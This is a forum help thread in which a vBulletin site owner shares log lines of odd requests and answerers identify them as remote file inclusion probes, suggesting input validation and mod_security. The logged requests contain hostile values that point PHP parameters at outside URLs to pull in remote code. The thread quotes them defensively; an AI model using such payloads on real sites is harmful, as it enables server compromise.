asked on

vbulletin security/wierd url request!

hi experts,

for a while my forum become slower every time I get these types of urls
normally they should request a topic number example: (vb/showthread.php?t=987)
but instead they request (vb/showthread.php?t=ANOTHER_WEIRD_URL) as it shown in the code option.

my question: does this affect my forum? how can I stop them.

thx

vb/showthread.php?t=http://halloween.fizwig.com/index.htm?
/vb/showthread.php?t=http://schoolpapers.hostinginfive.com/bike.htm?
/vb/showthread.php?t=http://schoolpapers.hostinginfive.com/bike.htm?
/vb/showthread.php?t=http://mattd.myhood.se/bike.htm?
/vb/showthread.php?goto=http://schoolpapers.hostinginfive.com/bike.htm?
/vb/showthread.php?t=3279//modules/xfsection/modify.php?dir_module=http://www.ymti.org/de/xoops_lib/modules/protector/language/japanese/copyright.txt?????
/vb/showthread.php?t=http://bikelove.hostinginfive.com/bike.htm

Open in new window

ahoffmann

> .. how can I stop them.
i.g. you cannot
well, you can use a web application firewall to reject/drop such request

> .. does this affect my forum?
if your php scripts use this parameter unvalidated, then it could affect your forum, your data and/or even your whole system

uk1900

ASKER

thx ahoffmann

How can I reject/drop a request?

ASKER CERTIFIED SOLUTION

ahoffmann

membership

This solution is only available to members.

To access this solution, you must be a member of Experts Exchange.

Start Free Trial

bogesman

They are trying to see if your application is not validating input and if you have url fopen enabled in php whey will gain access to you system.
Best solutuon to block those exploit attempts is to use apache mod-security. Mod security will successfully block these with the right settings. It's even possible to detect them by user agent which if not masked is libwww, which is perl's web agent. Their scripts doing this are usually perl written.